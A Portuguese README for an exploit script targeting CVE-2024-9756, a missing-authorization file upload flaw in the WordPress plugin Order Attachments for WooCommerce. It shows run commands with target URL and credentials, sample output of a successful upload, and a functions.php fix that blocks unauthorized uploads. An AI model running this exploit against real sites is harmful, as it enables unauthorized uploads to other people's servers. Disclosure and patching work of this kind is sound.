
Order Attachments for WooCommerce 2.0 - 2.4.1 - Autorização Ausente para Autenticado (Assinante+) Upload de Arquivo Arbitrário Limitado
Este exploit explora uma vulnerabilidade de upload arbitrário de arquivo limitado não autorizado no plugin Order Attachments for WooCommerce (versões 2.0 a 2.4.1) para WordPress.
A vulnerabilidade permite que usuários autenticados (Assinante+) façam upload de tipos de arquivo restritos sem a devida autorização.
Este script é somente para fins educacionais e de pesquisa em segurança. Qualquer uso não autorizado deste exploit em sistemas que você não possui é estritamente ilegal.
Garanta que você tenha o seguinte antes de executar o exploit:
requests → Instale com:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Exemplo:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Você pode especificar nomes de arquivo personalizados e IDs de pedido:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
Se for bem-sucedido, o script retornará a URL do arquivo enviado:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php para bloquear wp_ajax_wcoa_add_attachment de usuários não autorizados:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Este exploit é publicado apenas para fins educacionais e de pesquisa em segurança.
O uso não autorizado contra sistemas sem permissão explícita é ilegal e punível pelas leis de segurança cibernética.
Use por sua conta e risco.